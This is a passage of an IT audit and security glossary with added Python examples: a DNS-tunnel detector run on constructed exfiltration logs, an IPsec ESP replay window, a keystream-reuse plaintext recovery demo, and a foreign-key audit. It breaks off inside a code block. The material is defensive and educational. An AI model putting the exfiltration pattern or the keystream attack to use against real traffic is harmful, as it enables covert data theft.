Scope Note: This can be accomplished with different and/or duplicate cable sheaths. If different cable sheaths are used, the cable may be in the same conduit and, therefore, subject to the same interruptions as the cable it is backing up. The communication service subscriber can duplicate the facilities by having alternate routes, although the entrance to and from the customer premises may be in the same conduit. The subscriber can obtain diverse routing and alternate routing from the local carrier, including dual entrance facilities. However, acquiring this type of access is time consuming and costly. Most carriers provide facilities for alternate and diverse routing, although the majority of services are transmitted over terrestrial media. These cable facilities are usually located in the ground or basement. Ground-based facilities are at great risk due to the aging infrastructures of cities. In addition, cable-based facilities usually share room with mechanical and electrical systems that can impose great risk due to human error and disastrous events.

Domain
In COBIT, the grouping of control objectives into four logical stages in the life cycle of investments involving IT (Plan and Organise, Acquire and Implement, Deliver and Support, and Monitor and Evaluate)

Domain name system (DNS)
A hierarchical database that is distributed across the Internet that allows names to be resolved into IP addresses (and vice versa) to locate services such as web and email servers

Domain name system (DNS) exfiltration
Tunneling over DNS to gain network access or to move data out of a network covertly. A lower level attack vector for simple to complex data transmission: slow, but difficult to detect, because DNS traffic is normally allowed through perimeter controls.
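The "slow but difficult to detect" property comes from the tunnel hiding in ordinary-looking queries; what gives it away is the shape of the names over time. The following Python is an added example, not ISACA text or any vendor's detection logic. It scores resolver query logs per registered domain on three signals a DNS tunnel usually exhibits: many unique names, long high-entropy leading labels, and record types that carry arbitrary data. The log lines, domain names, hex-encoded labels and thresholds are all constructed for the example; the "last two labels are the registrable domain" rule is a simplification used so the code runs offline without a public suffix list.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log sample (not real traffic): timestamp, client, qtype, qname.
SAMPLE_LOG = """\
2014-03-02T10:00:01Z 10.0.0.5 A www.example.com
2014-03-02T10:00:02Z 10.0.0.5 A mail.example.com
2014-03-02T10:00:03Z 10.0.0.7 A d1f9a8c3b2e4f5a6b7c8d9e0f1a2b3c4.assets.cdn-example.net
2014-03-02T10:00:04Z 10.0.0.9 TXT 9f3a71c0e2d84b6f5a1c3e7d2b9f0a4e.t.exfil-test.example
2014-03-02T10:00:05Z 10.0.0.9 TXT 0c8e5b2f7a93d1e64f0b8a2c9d7e3f15.t.exfil-test.example
2014-03-02T10:00:06Z 10.0.0.9 TXT b7d2f0a9c4e1836f5b2d7a0c9e4f1386.t.exfil-test.example
2014-03-02T10:00:07Z 10.0.0.9 TXT 3e9a6c1f8b0d5724e6a9c3f1b8d0a527.t.exfil-test.example
2014-03-02T10:00:08Z 10.0.0.9 TXT f5c0a3d9e8b27164c5f0a9d3e2b17f64.t.exfil-test.example
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(label):
    """Bits per character; encoded payload sits near log2(alphabet size)."""
    if not label:
        return 0.0
    n = len(label)
    return -sum((label.count(c) / n) * math.log2(label.count(c) / n) for c in set(label))


def registered_domain(qname):
    # Assumption: the last two labels are the registrable domain (no public
    # suffix list is consulted, so the example runs offline).
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def analyse(log_text, min_unique=4, min_label_len=20, min_entropy=3.0):
    """Score each registered domain on tunnel signals. Thresholds are tuning
    assumptions for the constructed sample, not recommended production values."""
    per_domain = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            _, _, qtype, qname = m.groups()
            per_domain[registered_domain(qname)].append((qtype.upper(), qname.lower()))

    findings = {}
    for domain, queries in per_domain.items():
        unique = sorted({q for _, q in queries})
        leading = [q.split(".")[0] for q in unique]
        avg_len = sum(map(len, leading)) / len(leading)
        avg_entropy = sum(shannon_entropy(l) for l in leading) / len(leading)
        data_ratio = sum(1 for t, _ in queries if t in ("TXT", "NULL", "CNAME")) / len(queries)
        findings[domain] = {
            "unique_names": len(unique),
            "avg_leading_label_len": round(avg_len, 1),
            "avg_leading_entropy": round(avg_entropy, 2),
            "data_carrying_ratio": round(data_ratio, 2),
            # Volume AND shape must both be present: a single long hashed CDN
            # hostname looks like a tunnel label but is not a tunnel.
            "suspicious": (len(unique) >= min_unique
                           and avg_len >= min_label_len
                           and avg_entropy >= min_entropy),
        }
    return findings


if __name__ == "__main__":
    for domain, f in analyse(SAMPLE_LOG).items():
        print(("SUSPECT " if f["suspicious"] else "ok      ") + domain, f)
```

The `cdn-example.net` line is included deliberately: one long random-looking hostname is normal on today's Internet, so a detector that triggers on label shape alone produces false positives; the query volume per domain is what separates a tunnel from a content delivery network.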
Domain name system (DNS) poisoning
Corrupts the table of an Internet server's DNS, replacing a legitimate Internet address with a rogue address
Scope Note: If a web user looks for the page with that address, the request is redirected by the rogue entry in the table to a different address. Cache poisoning differs from another form of DNS poisoning in which the attacker spoofs valid email accounts and floods the "in" boxes of administrative and technical contacts. Cache poisoning is related to URL poisoning or location poisoning, in which an Internet user's behavior is tracked by adding an identification number to the location line of the browser that can be recorded as the user visits successive pages on the site. It is also called DNS cache poisoning or cache poisoning.

Double loop step
Integrates the management of tactics (financial budgets and monthly reviews) and the management of strategy
Scope Note: A reporting system, based on the balanced scorecard (BSC), that allows processes to be monitored against strategy and corrective actions to be taken as required

Downloading
The act of transferring computerized information from one computer to another computer

Downtime report
A report that identifies the elapsed time when a computer is not operating correctly because of machine failure
Driver (value and risk)
A driver includes an event or other activity that results in the identification of an assurance/audit need

Dry pipe fire extinguisher system
Refers to a sprinkler system that does not have water in the pipes during idle usage, unlike a fully charged fire extinguisher system that has water in the pipes at all times
Scope Note: The dry pipe system is activated at the time of the fire alarm and water is emitted to the pipes from a water reservoir for discharge to the location of the fire.

Dual control
A procedure that uses two or more entities (usually persons) operating in concert to protect a system resource so that no single entity acting alone can access that resource

Due care
The level of care expected from a reasonable person of similar competency under similar conditions

Due diligence
The performance of those actions that are generally regarded as prudent, responsible and necessary to conduct a thorough and objective investigation, review and/or analysis

Due professional care
Diligence that a person who possesses a special skill would exercise under a given set of circumstances

Dumb terminal
A display terminal without processing capability
Scope Note: Dumb terminals are dependent on the main computer for processing. All entered data are accepted without further editing or validation.

Duplex routing
The method or communication mode of routing data over the communication network

Dynamic analysis
Analysis that is performed in a real time or continuous form

Dynamic Host Configuration Protocol (DHCP)
A protocol used by networked computers (clients) to obtain IP addresses and other parameters, such as the default gateway, subnet mask and IP addresses of domain name system (DNS) servers, from a DHCP server
Scope Note: The DHCP server ensures that all IP addresses are unique (e.g., no IP address is assigned to a second client while the first client's assignment is valid [its lease has not expired]). Thus, IP address pool management is done by the server and not by a human network administrator.

Dynamic partitioning
The variable allocation of central processing unit (CPU) processing and memory to multiple applications and data on a server

Dynamic ports
Dynamic and/or private ports, 49152 through 65535; not listed by IANA because of their dynamic nature.

Eavesdropping
Listening to a private communication without permission

Echo checks
Detects line errors by retransmitting data back to the sending device for comparison with the original transmission
Ecommerce
The processes by which enterprises conduct business electronically with their customers, suppliers and other external business partners, using the Internet as an enabling technology
Scope Note: Ecommerce encompasses both business-to-business (B2B) and business-to-consumer (B2C) ecommerce models, but does not include existing non-Internet ecommerce methods based on private networks such as electronic data interchange (EDI) and Society for Worldwide Interbank Financial Telecommunication (SWIFT).

Economic value add (EVA)
Technique developed by G. Bennett Stewart III and registered by the consulting firm of Stern, Stewart, in which the performance of the corporate capital base (including depreciated investments such as training, research and development) as well as more traditional capital investments such as physical property and equipment are measured against what shareholders could earn elsewhere

Edit control
Detects errors in the input portion of information that is sent to the computer for processing. May be manual or automated and allow the user to edit data errors before processing

Editing
Ensures that data conform to predetermined criteria and enables early identification of potential errors

Egress
Network communications going out

Electronic data interchange (EDI)
The electronic transmission of transactions (information) between two enterprises. EDI promotes a more efficient paperless environment. EDI transmissions can replace the use of standard documents, including invoices or purchase orders.

Electronic document
An administrative document (a document with legal validity, such as a contract) in any graphical, photographic, electromagnetic (tape) or other electronic representation of the content
Scope Note: Almost all countries have developed legislation concerning the definition, use and legal validity of an electronic document. An electronic document, in whatever media that contains the data or information used as evidence of a contract or transaction between parties, is considered together with the software program capable of reading it. The definition of a legally valid document as any representation of legally relevant data, not only those printed on paper, was introduced into the legislation related to computer crime. In addition, many countries, in defining and disciplining the use of such instruments, have issued regulations defining specifics, such as the electronic signature and data interchange formats.

Electronic funds transfer (EFT)
The exchange of money via telecommunications. EFT refers to any financial transaction that originates at a terminal and transfers a sum of money from one account to another
Electronic signature
Any technique designed to provide the electronic equivalent of a handwritten signature to demonstrate the origin and integrity of specific data. Digital signatures are an example of electronic signatures.

Electronic vaulting
A data recovery strategy that allows enterprises to recover data within hours after a disaster
Scope Note: Typically used for batch/journal updates to critical files to supplement full backups taken periodically; includes recovery of data from an offsite storage media that mirrors data via a communication link

Elliptic curve cryptography (ECC)
A family of public key algorithms based on the algebraic structure of elliptic curves over finite fields. ECC achieves security comparable to traditional methods such as RSA, whose difficulty rests on integer factoring, with much smaller keys.
Scope Note: Smaller keys are more suitable to mobile devices.

Embedded audit module (EAM)
Integral part of an application system that is designed to identify and report specific transactions or other information based on predetermined criteria. Identification of reportable items occurs as part of real time processing. Reporting may be real time online or may use store and forward methods. Also known as integrated test facility or continuous auditing module.

Encapsulation (objects)
The technique used by layered protocols in which a lower layer protocol accepts a message from a higher layer protocol and places it in the data portion of a frame in the lower layer

Encapsulating Security Payload (ESP)
Protocol designed to provide a mix of security services in IPv4 and IPv6. ESP can be used to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service (a form of partial sequence integrity), and (limited) traffic flow confidentiality. (RFC 4303)
Scope Note: The ESP header is inserted after the IP header and before the next layer protocol header (transport mode) or before an encapsulated IP header (tunnel mode).
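The "anti-replay service (a form of partial sequence integrity)" is the one ESP service that can be shown end to end without keys. The following Python is an added example, not ISACA text and not code from any IPsec implementation. It parses the fixed part of the ESP header (the 32-bit SPI and 32-bit Sequence Number, RFC 4303 section 2) and runs the receiver's sliding-window replay check from section 3.4.3: a packet whose sequence number is to the right of the window is accepted, one inside the window is accepted only if its bit is not yet set, and one that has fallen off the left edge is dropped. The packets, the SPI value 0x1000 and the `icv_ok` callable are constructed; the callable stands in for integrity check value verification, which needs the SA's key and is out of scope here, but it sits where RFC 4303 puts it: after the window check and before the window is advanced.

```python
import struct

ESP_HEADER = struct.Struct("!II")   # SPI, Sequence Number; network byte order
WINDOW_SIZE = 64                     # RFC 4303 3.4.3: minimum 32; 64 is the usual default


def build_esp(spi, seq, payload=b""):
    """Constructed test helper: fixed ESP header followed by an opaque payload."""
    return ESP_HEADER.pack(spi, seq) + payload


def parse_esp_header(packet):
    """Return (spi, seq) from the fixed part of an ESP header."""
    if len(packet) < ESP_HEADER.size:
        raise ValueError("truncated-header")
    spi, seq = ESP_HEADER.unpack_from(packet, 0)
    if spi == 0:
        raise ValueError("reserved-spi")          # SPI 0 is reserved (RFC 4303 2.1)
    return spi, seq


class ReplayWindow:
    """Sliding anti-replay window over a 32-bit sequence number (no ESN).

    Bit 0 of `bitmap` stands for `last` (highest seq accepted so far); bit i
    stands for `last - i`. A set bit means that packet was already received.
    """

    def __init__(self, size=WINDOW_SIZE):
        self.size = size
        self.last = 0
        self.bitmap = 0

    def check(self, seq):
        """None if `seq` may be accepted, otherwise the rejection reason.
        Performed before the ICV check, so replays cost no crypto work."""
        if seq == 0:
            return "invalid-seq"                  # first packet on an SA carries seq 1
        if seq > self.last:
            return None                           # new high-water mark
        diff = self.last - seq
        if diff >= self.size:
            return "stale"                        # older than the window covers
        if (self.bitmap >> diff) & 1:
            return "replay"                       # seen already
        return None

    def update(self, seq):
        """Advance the window. Only call after the ICV has verified."""
        if seq > self.last:
            shift = seq - self.last
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            self.last = seq
        else:
            self.bitmap |= 1 << (self.last - seq)


def receive(packets, expected_spi, icv_ok=lambda pkt: True):
    """Receiver pipeline: SPI lookup, replay check, ICV check, window update."""
    window = ReplayWindow()
    verdicts = []
    for pkt in packets:
        try:
            spi, seq = parse_esp_header(pkt)
        except ValueError as exc:
            verdicts.append(str(exc))
            continue
        if spi != expected_spi:
            verdicts.append("bad-spi")            # no Security Association for this SPI
            continue
        reason = window.check(seq)
        if reason:
            verdicts.append(reason)
            continue
        if not icv_ok(pkt):                       # stand-in for ICV verification
            verdicts.append("bad-icv")
            continue
        window.update(seq)
        verdicts.append("accept")
    return verdicts


# Constructed sequence: in order, reordered, duplicated, a large jump, one packet
# that fell behind the window, a replay of the newest packet, seq 0, wrong SPI.
SPI = 0x1000
PACKETS = [build_esp(SPI, s) for s in (1, 2, 3, 5, 4, 3, 200, 150, 100, 200, 0)]
PACKETS.append(build_esp(0x2000, 7))

if __name__ == "__main__":
    for pkt, verdict in zip(PACKETS, receive(PACKETS, SPI)):
        print(parse_esp_header(pkt) if pkt[:4] != b"\0\0\0\0" else pkt, verdict)
```

Two details matter in practice and are visible in the trace: sequence 4 arriving after 5 is accepted (reordering is tolerated within the window), while sequence 100 arriving after 200 is dropped as stale even though it was never seen, which is the "partial" in partial sequence integrity.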
Encryption
The process of taking an unencrypted message (plaintext), applying a mathematical function to it (encryption algorithm with a key) and producing an encrypted message (ciphertext)

Encryption algorithm
A mathematically based function or calculation that encrypts/decrypts data

Encryption key
A piece of information, in a digitized form, used by an encryption algorithm to convert the plaintext to the ciphertext

End-user computing
The ability of end users to design and implement their own information system utilizing computer software products

Engagement letter
Formal document which defines an IS auditor's responsibility, authority and accountability for a specific assignment

Enterprise
A group of individuals working together for a common purpose, typically within the context of an organizational form such as a corporation, public agency, charity or trust
Enterprise architecture (EA)
Description of the fundamental underlying design of the components of the business system, or of one element of the business system (e.g., technology), the relationships among them, and the manner in which they support the enterprise's objectives

Enterprise architecture (EA) for IT
Description of the fundamental underlying design of the IT components of the business, the relationships among them, and the manner in which they support the enterprise's objectives

Enterprise goal
Scope Note: See Business goal

Enterprise governance
A set of responsibilities and practices exercised by the board and executive management with the goal of providing strategic direction, ensuring that objectives are achieved, ascertaining that risk is managed appropriately and verifying that the enterprise's resources are used responsibly

Enterprise risk management (ERM)
The discipline by which an enterprise in any industry assesses, controls, exploits, finances and monitors risk from all sources for the purpose of increasing the enterprise's short- and long-term value to its stakeholders

Eradication
When containment measures have been deployed after an incident occurs, the root cause of the incident must be identified and removed from the network.
Scope Note: Eradication methods include: restoring backups to achieve a clean state of the system, removing the root cause, improving defenses and performing vulnerability analysis to find further potential damage from the same root cause.

ERP (enterprise resource planning) system
A packaged business software system that allows an enterprise to automate and integrate the majority of its business processes, share common data and practices across the entire enterprise, and produce and access information in a real time environment
Scope Note: Examples of ERP include SAP, Oracle Financials and J.D. Edwards.

Error
A deviation from accuracy or correctness
Scope Note: As it relates to audit work, errors may relate to control deviations (compliance testing) or misstatements (substantive testing).

Escrow agent
A person, agency or enterprise that is authorized to act on behalf of another to create a legal relationship with a third party in regard to an escrow agreement; the custodian of an asset according to an escrow agreement
Scope Note: As it relates to a cryptographic key, an escrow agent is the agency or enterprise charged with the responsibility for safeguarding the key components of the unique key.
Escrow agreement
A legal arrangement whereby an asset (often money, but sometimes other property such as art, a deed of title, a web site, software source code or a cryptographic key) is delivered to a third party (called an escrow agent) to be held in trust or otherwise pending a contingency or the fulfillment of a condition or conditions in a contract
Scope Note: Upon the occurrence of the contingency specified in the escrow agreement, the escrow agent will deliver the asset to the proper recipient; otherwise the escrow agent is bound by his/her fiduciary duty to maintain the escrow account. Source code escrow means deposit of the source code for the software into an account held by an escrow agent. Escrow is typically requested by a party licensing software (e.g., licensee or buyer), to ensure maintenance of the software. The software source code is released by the escrow agent to the licensee if the licensor (e.g., seller or contractor) files for bankruptcy or otherwise fails to maintain and update the software as promised in the software license agreement.

Ethernet
A popular network protocol and cabling scheme that uses a bus topology and carrier sense multiple access/collision detection (CSMA/CD) to prevent network failures or collisions when two devices try to access the network at the same time

Event
Something that happens at a specific place and/or time

Event type
For the purpose of IT risk management, one of three possible sorts of events: threat event, loss event and vulnerability event
Scope Note: Being able to consistently and effectively differentiate the different types of events that contribute to risk is a critical element in developing good risk-related metrics and well-informed decisions. Unless these categorical differences are recognized and applied, any resulting metrics lose meaning and, as a result, decisions based on those metrics are far more likely to be flawed.

Evidence
1. Information that proves or disproves a stated issue
2. Information that an auditor gathers in the course of performing an IS audit; relevant if it pertains to the audit objectives and has a logical relationship to the findings and conclusions it is used to support
Scope Note: Audit perspective

Exception reports
An exception report is generated by a program that identifies transactions or data that appear to be incorrect.
Scope Note: Exception reports may be outside a predetermined range or may not conform to specified criteria.
Exclusive OR (XOR)
The exclusive OR operator returns a value of TRUE only if just one of its operands is TRUE.
Scope Note: The XOR operation is a Boolean operation that produces a 0 if its two Boolean inputs are the same (0 and 0, or 1 and 1) and that produces a 1 if its two inputs are different (1 and 0). In contrast, an inclusive OR operator returns a value of TRUE if either or both of its operands are TRUE.
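XOR is the building block behind several entries on these pages: the encryption/encryption key entries above (a one-time pad is nothing but XOR with a key as long as the message, used once) and dual control (a key split into XOR shares held by two custodians, neither of whom learns anything alone). The following Python is an added example, not ISACA text; the key, the two messages and the split-share construction are constructed assumptions. Beyond the truth table, it shows the property practitioners most need to remember: because x ^ k ^ k == x, reusing a keystream cancels the key out and leaks the XOR of the two plaintexts, so one known plaintext exposes the other.

```python
import secrets


def xor_bytes(a, b):
    """Bytewise XOR of two equal-length byte strings (the XOR table applied per bit)."""
    if len(a) != len(b):
        raise ValueError("operands must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def xor_truth_table():
    """The glossary's table: output 1 only when the two inputs differ."""
    return {(a, b): a ^ b for a in (0, 1) for b in (0, 1)}


# One-time pad: encrypt and decrypt are the same operation because x ^ k ^ k == x.
def otp_encrypt(plaintext, key):
    return xor_bytes(plaintext, key)


def otp_decrypt(ciphertext, key):
    return xor_bytes(ciphertext, key)


def keystream_reuse_leak(c1, c2):
    """If one key encrypted both messages then c1 ^ c2 == p1 ^ p2: the key is gone."""
    return xor_bytes(c1, c2)


def recover_other_plaintext(c1, c2, known_p1):
    """Known plaintext for one message yields the other: (p1 ^ p2) ^ p1 == p2."""
    return xor_bytes(keystream_reuse_leak(c1, c2), known_p1)


# Dual control with XOR shares: each custodian's share is uniformly random on its
# own, so neither can reconstruct the key without the other.
def split_secret(key):
    share_a = secrets.token_bytes(len(key))
    share_b = xor_bytes(key, share_a)
    return share_a, share_b


def combine_shares(share_a, share_b):
    return xor_bytes(share_a, share_b)


# Constructed sample values (not from any real system); all 17 bytes long.
KEY = bytes.fromhex("3b7e151628aed2a6abf7158809cf4f3c9a")
P1 = b"TRANSFER 1000 GBP"
P2 = b"TRANSFER 9999 USD"

if __name__ == "__main__":
    c1, c2 = otp_encrypt(P1, KEY), otp_encrypt(P2, KEY)
    print("c1 ^ c2 == p1 ^ p2:", keystream_reuse_leak(c1, c2) == xor_bytes(P1, P2))
    print("recovered p2:", recover_other_plaintext(c1, c2, P1))
    a, b = split_secret(KEY)
    print("shares recombine:", combine_shares(a, b) == KEY)
```

The same cancellation is why stream ciphers and counter-mode block ciphers must never reuse a nonce under one key: the keystream, not the key, is what XOR removes.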
Executable code
The machine language code that is generally referred to as the object or load module

Expert system
The most prevalent type of computer system that arises from the research of artificial intelligence
Scope Note: An expert system has a built-in hierarchy of rules, which are acquired from human experts in the appropriate field. Once input is provided, the system should be able to define the nature of the problem and provide recommendations to solve the problem.

Exploit
Full use of a vulnerability for the benefit of an attacker

Exposure
The potential loss to an area due to the occurrence of an adverse event

Extended Binary Coded Decimal Interchange Code (EBCDIC)
An 8-bit code representing 256 characters; used in most large computer systems

Extended enterprise
Describes an enterprise that extends outside its traditional boundaries. Such enterprises concentrate on the processes they do best and rely on someone outside the entity to perform the remaining processes.

eXtensible Access Control Markup Language (XACML)
A declarative online software application user access control policy language implemented in Extensible Markup Language (XML)

eXtensible Markup Language (XML)
Promulgated through the World Wide Web Consortium, XML is a web-based application development technique that allows designers to create their own customized tags, thus enabling the definition, transmission, validation and interpretation of data between applications and enterprises.

External router
The router at the extreme edge of the network under control, usually connected to an Internet service provider (ISP) or other service provider; also known as border router.

External storage
The location that contains the backup copies to be used in case recovery or restoration is required in the event of a disaster

Extranet
A private network that resides on the Internet and allows a company to securely share business information with customers, suppliers or other businesses as well as to execute electronic transactions
Scope Note: Different from an Intranet in that it is located beyond the company's firewall. Therefore, an extranet relies on the use of securely issued digital certificates (or alternative methods of user authentication) and encryption of messages. A virtual private network (VPN) and tunneling are often used to implement extranets, to ensure security and privacy.
Failover
The transfer of service from an incapacitated primary component to its backup component

Fail-safe
Describes the design properties of a computer system that allow it to resist active attempts to attack or bypass it

Fallback procedures
A plan of action or set of procedures to be performed if a system implementation, upgrade or modification does not work as intended
Scope Note: May involve restoring the system to its state prior to the implementation or change. Fallback procedures are needed to ensure that normal business processes continue in the event of failure and should always be considered in system migration or implementation.

Fall-through logic
An optimized code based on a branch prediction that predicts which way a program will branch when an application is presented

False authorization
Also called false acceptance, occurs when an unauthorized person is identified as an authorized person by the biometric system

False enrollment
Occurs when an unauthorized person manages to enroll into the biometric system
Scope Note: Enrollment is the initial process of acquiring a biometric feature and saving it as a personal reference on a smart card, a PC or in a central database.

False negative
In intrusion detection, an error that occurs when an attack is misdiagnosed as a normal activity

False positive
A result that has been mistakenly identified as a problem when, in reality, the situation is normal

Fault tolerance
A system's level of resilience to seamlessly react to hardware and/or software failure

Feasibility study
A phase of a system development life cycle (SDLC) methodology that researches the feasibility and adequacy of resources for the development or acquisition of a system solution to a user need

Fiber optic cable
Glass fibers that transmit binary signals over a telecommunications network
Scope Note: Fiber optic systems have low transmission losses as compared to twisted pair cables. They do not radiate energy or conduct electricity. They are free from corruption and lightning-induced interference, and they reduce the risk of wiretaps.

Field
An individual data element in a computer record
Scope Note: Examples include employee name, customer address, account number, product unit price and product quantity in stock.

File
A named collection of related records

File allocation table (FAT)
A table used by the operating system to keep track of where every file is located on the disk
Scope Note: Since a file is often fragmented and thus subdivided into many sectors within the disk, the information stored in the FAT is used when loading or updating the contents of the file.
File layout
Specifies the length of the file record and the sequence and size of its fields
Scope Note: Also will specify the type of data contained within each field; for example, alphanumeric, zoned decimal, packed and binary.

File server
A high-capacity disk storage device or a computer that stores data centrally for network users and manages access to those data
Scope Note: File servers can be dedicated so that no process other than network management can be executed while the network is available; file servers can be non-dedicated so that standard user applications can run while the network is available.

File Transfer Protocol (FTP)
A protocol used to transfer files over a Transmission Control Protocol/Internet Protocol (TCP/IP) network (Internet, UNIX, etc.)

Filtering router
A router that is configured to control network access by comparing the attributes of the incoming or outgoing packets to a set of rules

FIN (Final)
A flag set in a packet to indicate that this packet is the final data packet of the transmission

Financial audit
An audit designed to determine the accuracy of financial records and information

Finger
A protocol and program that allows the remote identification of users logged into a system

Firewall
A system or combination of systems that enforces a boundary between two or more networks, typically forming a barrier between a secure and an open environment such as the Internet

Firmware
Memory chips with embedded program code that hold their content when power is turned off

Fiscal year
Any yearly accounting period without regard to its relationship to a calendar year

Foreign key
A value that represents a reference to a tuple (a row in a table) containing the matching candidate key value
Scope Note: The problem of ensuring that the database does not include any invalid foreign key values is known as the referential integrity problem. The constraint that values of a given foreign key must match values of the corresponding candidate key is known as a referential constraint. The relation (table) that contains the foreign key is referred to as the referencing relation and the relation that contains the corresponding candidate key as the referenced relation or target relation. (In relational theory it would be a candidate key, but in real database management system (DBMS) implementations it is always the primary key.)
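The referential integrity problem in the Scope Note is concrete when the referential constraint is switched off, which some engines do by default. The following Python is an added example, not ISACA text; it uses the standard library's sqlite3 module, where foreign key enforcement is opt-in per connection (`PRAGMA foreign_keys`). The schema (an `employee` referenced relation and a `payroll` referencing relation), the rows and the orphan row are constructed. The same database is built twice, once with the constraint enforced and once without, and an audit query shows the orphans that the unenforced copy accepts.

```python
import sqlite3

# Constructed schema: payroll.employee_id is the foreign key; employee.id is the
# referenced (primary) key that every payroll row must match.
SCHEMA = """
CREATE TABLE employee (
    id   INTEGER PRIMARY KEY,
    name TEXT NOT NULL
);
CREATE TABLE payroll (
    id          INTEGER PRIMARY KEY,
    employee_id INTEGER NOT NULL REFERENCES employee(id) ON DELETE RESTRICT,
    amount      INTEGER NOT NULL
);
INSERT INTO employee VALUES (1, 'A. Example');
INSERT INTO payroll  VALUES (10, 1, 250000);
"""


def open_db(enforce_fk=True):
    """In-memory database; SQLite checks referential constraints only when asked."""
    con = sqlite3.connect(":memory:")
    con.execute("PRAGMA foreign_keys = %s" % ("ON" if enforce_fk else "OFF"))
    con.executescript(SCHEMA)
    return con


def insert_orphan(con):
    """Payroll row pointing at employee 999, who does not exist.
    Returns True if the DBMS let the invalid foreign key in."""
    try:
        con.execute("INSERT INTO payroll VALUES (11, 999, 1)")
        con.commit()
        return True
    except sqlite3.IntegrityError:
        con.rollback()
        return False


def delete_referenced_employee(con):
    """Deleting a referenced row would orphan payroll 10. True if allowed."""
    try:
        con.execute("DELETE FROM employee WHERE id = 1")
        con.commit()
        return True
    except sqlite3.IntegrityError:
        con.rollback()
        return False


def orphaned_payroll(con):
    """Audit query: foreign key values with no matching candidate key."""
    return con.execute("""
        SELECT p.id, p.employee_id
          FROM payroll p
          LEFT JOIN employee e ON e.id = p.employee_id
         WHERE e.id IS NULL
         ORDER BY p.id
    """).fetchall()


if __name__ == "__main__":
    for enforce in (True, False):
        con = open_db(enforce)
        print("enforced" if enforce else "not enforced",
              "orphan insert allowed:", insert_orphan(con),
              "referenced delete allowed:", delete_referenced_employee(con),
              "orphans:", orphaned_payroll(con))
```

The `LEFT JOIN ... WHERE e.id IS NULL` pattern is the generic test an auditor runs against any pair of referencing and referenced relations when the DBMS cannot be trusted to have enforced the constraint at write time.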
Forensic examination
The process of collecting, assessing, classifying and documenting digital evidence to assist in the identification of an offender and the method of compromise

Format checking
The application of an edit, using a predefined field definition, to a submitted information stream; a test to ensure that data conform to a predefined format

Fourth-generation language (4GL)
High-level, user-friendly, nonprocedural computer language used to program and/or read and process computer files
Frame relay
A packet-switched wide area network (WAN) technology that provides faster performance than older packet-switched WAN technologies
Scope Note: Best suited for data and image transfers. Because of its variable-length packet architecture, it is not the most efficient technology for real time voice and video. In a frame relay network, end nodes establish a connection via a permanent virtual circuit (PVC).

Framework
Scope Note: See Control framework and IT governance framework.

Freeware
Software available free of charge

Frequency
A measure of the rate by which events occur over a certain period of time

Full economic life cycle
The period of time during which material business benefits are expected to arise from, and/or during which material expenditures (including investments, running and retirement costs) are expected to be incurred by, an investment program
Scope Note: COBIT 5 perspective

Function point analysis
A technique used to determine the size of a development task, based on the number of function points
Scope Note: Function points are factors such as inputs, outputs, inquiries and logical internal sites.

Gateway
A device (router, firewall) on a network that serves as an entrance to another network

General computer control
A control, other than an application control, that relates to the environment within which computer-based application systems are developed, maintained and operated, and that is therefore applicable to all applications. The objectives of general controls are to ensure the proper development and implementation of applications and the integrity of program and data files and of computer operations. Like application controls, general controls may be either manual or programmed. Examples of general controls include the development and implementation of an IS strategy and an IS security policy, the organization of IS staff to separate conflicting duties and planning for disaster prevention and recovery.

Generalized audit software (GAS)
Multipurpose audit software that can be used for general processes, such as record selection, matching, recalculation and reporting

Generic process control
A control that applies to all processes of the enterprise

Geographic disk mirroring
A data recovery strategy that takes a set of physically disparate disks and synchronously mirrors them over high-performance communication lines. Any write to a disk on one side will result in a write on the other side. The local write will not return until the acknowledgment of the remote write is successful.
Geographical information system (GIS)
A tool used to integrate, convert, handle, analyze and produce information regarding the surface of the earth
Scope Note: GIS data exist as maps, tridimensional virtual models, lists and tables

Good practice
A proven activity or process that has been successfully used by multiple enterprises and has been shown to produce reliable results

Governance
Ensures that stakeholder needs, conditions and options are evaluated to determine balanced, agreed-on enterprise objectives to be achieved; setting direction through prioritization and decision making; and monitoring performance and compliance against agreed-on direction and objectives
Scope Note: Conditions can include the cost of capital, foreign exchange rates, etc. Options can include shifting manufacturing to other locations, subcontracting portions of the enterprise to third parties, selecting a product mix from many available choices, etc.

Governance enabler
Something (tangible or intangible) that assists in the realization of effective governance
Scope Note: COBIT 5 perspective

Governance framework
A framework is a basic conceptual structure used to solve or address complex issues. An enabler of governance. A set of concepts, assumptions and practices that define how something can be approached or understood, the relationships amongst the entities involved, the roles of those involved, and the boundaries (what is and is not included in the governance system).
Scope Note: Examples: COBIT, COSO's Internal Control-Integrated Framework

Governance of enterprise IT
A governance view that ensures that information and related technology support and enable the enterprise strategy and the achievement of enterprise objectives; this also includes the functional governance of IT, i.e., ensuring that IT capabilities are provided efficiently and effectively.
Scope Note: COBIT 5 perspective

Governance, Risk Management and Compliance (GRC)
A business term used to group the three closely related disciplines responsible for the protection of assets and operations

Governance/management practice
For each COBIT process, the governance and management practices provide a complete set of high-level requirements for effective and practical governance and management of enterprise IT. They are statements of actions from governance bodies and management.
Scope Note: COBIT 5 perspective

Guideline
A description of a particular way of accomplishing something that is less prescriptive than a procedure

Hacker
An individual who attempts to gain unauthorized access to a computer system
Handprint scanner
A biometric device that is used to authenticate a user through palm scans

Harden
To configure a computer or other network device to resist attacks

Hardware
The physical components of a computer system

Hash function
An algorithm that maps or translates one set of bits into another (generally smaller) so that a message yields the same result every time the algorithm is executed using the same message as input
Scope Note: It is computationally infeasible for a message to be derived or reconstituted from the result produced by the algorithm or to find two different messages that produce the same hash result using the same algorithm.

Hash total
The total of any numeric data field in a document or computer file. This total is checked against a control total of the same field to facilitate accuracy of processing.

Hashing
Using a hash function (algorithm) to create hash values or checksums that validate message integrity
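The three entries above use "hash" for two different controls, and practitioners confuse them. A hash total is a batch control total: an arithmetic sum of one field that catches dropped or mistyped records but not changes that preserve the sum. A cryptographic hash function of the kind the Scope Note describes changes unpredictably when any bit of the input changes. The following Python is an added example, not ISACA text; the payroll records, the tampering scenarios and the canonical serialisation are constructed, and SHA-256 from the standard library stands in for "the algorithm".

```python
import hashlib

# Constructed payroll batch (not real data): (record id, amount in pence).
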